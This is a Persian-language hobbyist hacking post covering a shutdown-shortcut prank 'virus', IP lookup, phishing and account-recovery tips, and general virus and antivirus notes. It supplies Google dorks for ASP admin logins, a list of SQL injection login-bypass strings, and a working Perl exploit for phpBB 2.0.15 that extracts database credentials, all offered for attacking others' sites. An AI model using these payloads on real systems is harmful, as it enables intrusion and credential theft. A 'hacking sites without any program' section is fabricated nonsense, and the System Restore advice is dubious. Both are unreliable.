بچه ها گفتم یه سری مطالب رو بطور کلی بنویسم
نحوه ساختن ویروس بلستر
این ویروس کارش خاموش کردن کامپیوتر ظرف ۳۰ ثانیه است . بدین ترتیب که وقتی اجرا میشه پیغامی تحت عنوان اینکه کامپیوتر شما ظرف مدت ۳۰ خاموش می شود می دهد .اول آنتی ویروس یاد میدم بدنم خوده ویروس . اول روی دسکتاپ راست کلیک کرده و گزینه New shortcut را انتخاب کرده و تایپ کنید shutdown -a و Next را زده نامی براش انتخاب کرده و Finish را بزنید .الان آنتی ویروس شما آماده است میتونید روش راست کلیک کرده گزینه Properties را انتخاب کرده و change Icon را زده و آیکون آنرا عوض کنید . حالا نحوه ساختن ویروس باز روی دسکتاپ راست کلیک کرده و گزینه New shortcut را انتخاب کرده و تایپ کنید shutdown -r و Next را زده نامی براش انتخاب کرده و Finish را بزنید . الان ویروس شما آماده است باز می توانید شکل آیکون آنرا عوض کنید . نحوه استفاده از آن هم به عهده خودتون است .
نحوه پیدا کردن IP
برای پیدا کردن IP یه شخص تو چت یا IP یه سایت کافیه برید تو start در قسمت Run تایپ کنید cmdبعد ok را کلیک کنید . یه صفحه سیاه باز میشه اونجا تایپ کنید netstat -r یا netstat -n و Enter را فشار دهید .
یه راه برای اینکه هک نشوید
بعضی از هکرا یه صفحه می سازند شبیه صفحه sing up یاهو وقتی یوزر و پسورد می نویسید میره به ادرس ایمل طر ف و شما هک میشید . پس مواظب باشید یوزر و پسورد خودتونو هرجایی ننویسید .
اگه هک شدید چکار کنید
وقتی دارید آیدی می سازید یا آدرس ایمیل تو فرمی که پر می کنید از شما تاریخ تولد می پرسه . اون تاریخ هیشه یادتون باشه . چون وقتی آیدی شما هک شد باید برید تو یاهو تو پنجره sing in یه جایی هست که نوشته Forget your ID or password کلیک کنید و بعد تاریخ تولد خودتونو و آیدیتونو نوشته و روی get new password کلیک کنید . به همین سادگی می تونید آیدی خودتونو پس بگیرید .
هک کردن سایتها با پی اچ پی نوک
خوب از php که بگذريم ميرسيم به پورتالهاي قويتر و بهتر به نام asp که گفتم که asp هم يک زبان برنامه نويسي تحت وب هستش که تنها مشکلي هم که داره تو قسمت ورود به کنترل پنلش هستش که با يک پسوورد ميشه وارد اون شد که اين اشکال به اين دليل که کسي که سايت رو طراحي کرده اين اشکالات : ( ) , ( , = . " . ' ) رو فيلتر نکرده و شما ميتونيد با يک پسوورد که اين علامات در اون به کار رفته سايت رو اينجکت کنيد که injection در زبان انگليسي به معني تزريق کردن ميباشد خوب حالا من طرض استفاده اين کار رو بهتون ميگم ابتدا تو گوگل يا ... سرچ کنيد :
inurl:login.asp
inurl:admin.asp
خوب ميتونيد يک کلمه فارسي يا عربي مثل في يا فارسي يا ... جلوي اينها بنويسيد خوب بالاخره تو کار هک بايد از خودتون هم يخورده ابتکار عمل نشون بديد خوب حالا اون پسووردها هم اينها هستند :
' or ''='
admin" or "a"="a
admin" or 1=1 --
admin' or 1=1 --
admin' or 'a'='a
admin') or ('a'='a
admin") or ("a"="a
a=1)--
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a </BODY< SPAN>>
</< SPAN>html>
phpbb2.0.15 آموزش هک
شما توسط این اموزش میتونید به راحتی یه فروم رو هک کنید تنها کاری که لازمه اینکه در اون سایت عضو شید که خودبه خود سایت به شما یه کوکی میده وبااستفاده از همین کوکی سایت رو هک کنید
برای این کار ابتدا ببینید کوکی شما در کجا ذخیره میشه که عموما در
C:\Documents and Settings\name of your pc\Cookies
شما داره حالا میرید نو و کوکی اون فروم وهرچی نوشته به غیر از ستاره اخرسش رو pcذخیره میشه که بسته به اسم
copy
میکنید تابه شما کلیه اطلاعات لازم واسه هک روبده past exploitمیکنیدحالا این کدرودر این
exploit:اینم
#!/usr/bin/perl
# *******************************
#*
#* phpBB 2.0.15 Viewtopic.PHP Remote Code Execution Vulnerability
#* This exploit gives the user all the details about the database
#* connection such as database host, username, password and
#* database name.
#*
#* Written by SecureD, gvr.secured
#*
#* Greetings to GvR, Jumento, PP, CKrew & friends
#*
# *******************************
use IO::Socket;
print "+-----------------------------------------------------------------------+\r\n";
print "| PhpBB 2.0.15 Database Authentication Details Exploit |\r\n";
print "| By SecureD gvr.secured
print "+-----------------------------------------------------------------------+\r\n";
if (@ARGV < 3)
{
print "Usage:\r\n";
print "phpbbSecureD.pl SERVER DIR THREADID COOKIESTRING\r\n\r\n";
print "SERVER - Server where PhpBB is installed.\r\n";
print "DIR - PHPBB directory or / for no directory.\r\n";
print "THREADID - Id of an existing thread.\r\n";
print "COOKIESTRING - Optional, cookie string of the http request.\r\n";
print " Use this when a thread needs authentication for viewing\r\n";
print " You can use Firefox in combination with \"Live HTTP\r\n";
print " Headers\" to get this cookiestring.\r\n\r\n";
print "Example 1 (with cookiestring):\r\n";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 8 \"
phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22
autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22
userid%22%3Bs%3A1%3A%222%22%3B%7D;
phpbb2mysql_sid=10dae92b780914332896df43808c4e09\" \r\n\r\n";
print "Example 2 (without cookiestring):\r\n";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 20 \r\n";
exit();
}
$serv = $ARGV[0];
$dir = $ARGV[1];
$threadid = $ARGV[2];
$cookie = $ARGV[3];
$serv =~ s/http:\/\///ge;
$delimit = "GvRSecureD";
$sploit = $dir . "viewtopic.php?t=";
$sploit .= $threadid;
$sploit .= "&highlight='.printf($delimit.";
$sploit .= "\$dbhost.";
$sploit .= "$delimit.";
$sploit .= "\$dbname.";
$sploit .= "$delimit.";
$sploit .= "\$dbuser.";
$sploit .= "$delimit.";
$sploit .= "\$dbpasswd.";
$sploit .= "$delimit).'";
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80")
or die "[+] Connecting ... Could not connect to host.\n\n";
print "[+] Connecting OK\n";
sleep(1);
print "[+] Sending exploit ";
print $sock "GET $sploit HTTP/1.1\r\n";
print $sock "Host: $serv\r\n";
if ( defined $cookie) {
print $sock "Cookie: $cookie \r\n";
}
print $sock "Connection: close\r\n\r\n";
$succes = 0;
while ($answer = <$sock>) {
$delimitIndex = index $answer, $delimit;
if ($delimitIndex >= 0) {
$succes = 1;
$urlIndex = index $answer, "href";
if ($urlIndex < 0){
$answer = substr($answer, length($delimit));
$length = 0;
while (length($answer) > 0) {
$nex = index($answer, $delimit);
if ($nex > 0) {
push(@array, substr($answer, 0, $nex));
$answer = substr($answer, $nex + length($delimit), length($answer));
} else {
$answer= "";
}
}
}
}
}
close($sock);
if ($succes == 1) {
print "OK\n";
sleep(1);
print "[+] Database Host: " . $array[0] . "\n";
sleep(1);
print "[+] Database Name: " . $array[1] . "\n";
sleep(1);
print "[+] Username: " . $array[2] . "\n";
sleep(1);
print "[+] Password: " . $array[3] . "\n";
sleep(1);
} else {
print "FAILED\n";
}
آموزش کلی مبارزه با ویرووس ها و آشنایی با آنها
آموزش مبارزه با ویرووسها =>
شما اولین کاری که برای مبارزه با اونا میکنین اینه که دستگاهتونو به یه آنتی ویرووس مجهز کنین که بهترینشون Norton.symantec.mcAfee.panda &avg هستش اما اینم بگم که آنتی ویرووسهای Norton روی بعضی از ویندوز های Xpجواب نمیده و باعث هنگ کردن سیستم میشه .
اگه شما آنتی ویرووس نداشتین و به ویرووس آلوده شدین اولین کار اینه که سیستم خودتون رو Restor کنین تا ویرووس به همه جا انتقال پیدا نکنه که برای Restor کردن مراحل زیر رو انجام بدین : =>
1- روی My computer راست کلیک کرده و Propertiseرو انتخاب کنین
2- از صفحه باز شده اون بالا لبه ی System Restore رو انتخاب کنین
3- گزینه Turn off System restore رو تیک بزنین و در آخر Apply ... OK
با این کار از ویرووسی شدن تمام سیستم جلوگیری میکنین .
قدم دوم شناسایی ویرووس هست که بازم با آنتی ویرووس های میشه پیدا کرد ( بهتره یه شناختی از ویرووس ها بهتون بدم )
آشنایی کلی با ویرووس های کامپیوتری
1- ویرووس ها در کل به سه گروه طبقه بندی میشن 1- اسب تروا (Troijan-hourse ) . کرم ها ( Worms ) . بمب های منطقی (Logical bomb )
اهداف ویرووس ها :
ویرووس ها جایی انتشار پیدا می کنن که دارای تغییر پذیری باشه مثل ( جداول - رکورد بوت - پرونده ها و ....... ) پرونده هایی که دارای پسوند های sys.bat.com & exe هستن هدفهای اونا هستن .
چگونگی انتشار ویرووس :
ویرووس ها بیشتر خودشون رو به اسناد و فولدر ها میچسبونن و از طریق اونا وارد میشن . اگه ما 2 تا فولدر داشته باشیم که دارای اسم های یکی باشن ولی پسوند هاشون فرق کنه کامپیوتر اول اون برنامرو اجرا میکنه که پسوند .com رو داشته باشه به همین علت ویرووسها خودشون رو با همون اسم فایل ها تکثیر می کنن اما با پسوند .com که کامپیوتر اونارو اجرا کنه .
ساختار ویرووس ها :
ویرووس ها از دو بخش تکثیر و تخریب تشکیل شده اند . بعضی از ویرووس ها فقط برنامرو آلوده می کنن. در برنامه های آلوده یک علامت می نویسن که به آنها امضای ویرووس میگن و وقتی ویرووس بخواد برنامرو آلوده کنه اول به دنبال امضاء میگرده اگه وجود نداشت اونو آلوده میکنه و الگه وجود داشت که میدونه برنامه آلوده هست
آنتی ویرووس ها :
آنتی ها دارای 2 گونه میباشن یکی مقیم و اون یکی غیر مقیم که فرق اونا اینه که آنتی مقیم به محض شروع فعالیت ویرووس اونو شناسایی و از بین میبره . اما آنتی غیر مقیم به این شکل نیست .
آنتی ویرووس ها یه دروازه هستن که همیشه وقتی برنامه بخواد اجرا بشه باید اول از آنتی بگذره و بعد به سیستم عامل بره . اما اگه آنتی وجود نداشته باشه برنامه یه راست میره به سیستم عامل .
معرفی چند ویرووس :
1-Disk killer اگر کامپیوتر بیشتر از 24 ساعت روشن باشه Hard disk رو خراب میکنه
2- lazy باعث کم شدن حافظه و سرعت سیستم میشه
3- Mistake تمام حروف را بر روی پرینتر عوض میکنه مثلا حرف c را k و k رو c چاپ میکنه
4- Pc-Flu باعث مختل شدن کار های آنتی ویرووس ها میشه
5- Blaster باعث ریست شدن کامپیوتر و تکثیر در آن میشود
6-Albania باعث تکثیر فراوان در کمتر از 3 ساعت است
7- Nimda باعث تکثیر فراوان شده و آیکون های اون شبیه به پاکت نامه است
هک کردن سایت بدون هیچ برنامه ای
۱: در مرحله اول باید از طریق کاممند پرت آی پی سایت رو بدست بیاوریم.
۲:در مرحله دوم شما می بایست و ارد آدرس c:\windows\web شوید.
۳:در مرحله سوم باید شما باید با ایجاد کردن فولدر هایی که در آن ها نا هماهنگی هایی وجود دارد
در سرور آن سایت اختلال ایجاد کنید.و به راحتی در ۳ مرحله آن سایت رو هک کنید.
--------------------------------------------------------------------------------
ما یاد داده بودیم که آیپی سایت رو میتونیم به سادگی به دست آوریم.
بعد از این که آی پی سایت رو به دست آوردیم. وارد پوشه c:\windows\web شده و مراحل زیر رو به
ترتیب انجام دهید. در واقع در این روش ما با ایجاد زبان های هک برنامه نویسی جاوا سرور آن سایت
رو هک میکنیم.پس مراحل زیر رو دنبال کنید.
--------------------------------------------------------------------------------
۱:وارد پوشه وب در ویندوز شده فایل ها رو خوب مشاهده کنید.حالا وارد پوشه
c:\windows\java شده.خب پس از وارد فولدر classes شده و در آن یک نوتپد باز کنید.
نام نوتپد مهم نیست. (**هکره لیزری**). حالا وارد آن شده و این نوشته ها رو تایپ کنید.
--------------------------------------------------------------------------------
lan\:Q:\victumip\server\567\jav57\source\view
فقط باید به جای victumip آی پی سایت رو قرار بدید.حالا وارد پوشه وب که قبلا رفته بودید شوید.
و یک فولدر به نام c:\windows\classes بسازید.توجه داشته باشید که حتما باید آدرس دقیق پوشه
کلاسس رو بهش بدید.خب حالا ۹۹ درصد کار تموم شده است.وارد سایتی که برای کنترل سایت
هست شوید مانند بلاگفا که برای مدیریت وبلاگ هستش.حالا در قسمت username آدرس سایت رو
بنویسید و ورود یا signin رو بزنید حالا باید وارد بخش مدیریت شوید اگر نشد به جای یوزر نیم سایت
آی پی سایت رو وارد کنید و مطمئن باشید که این دفعه میره.البته این هک کردن با پرت ۵۶۷ هستش
و این قوی ترین پرتیه که من برای هک کردن سایت میشناسم هستش.
PC Security Test 2005امنیت!!!!!
به کمک این برنامه می تونید از امنیت کامپیوتر در مقابل ویروس ها و هکرها اطمینان حاصل کنید.
اینم لینک دانلود برنامه : http://www.pc-st.com/us/pcsecuritytest.zip
دیگه برای این دفعه بسته خسته شدم فعلا بای.
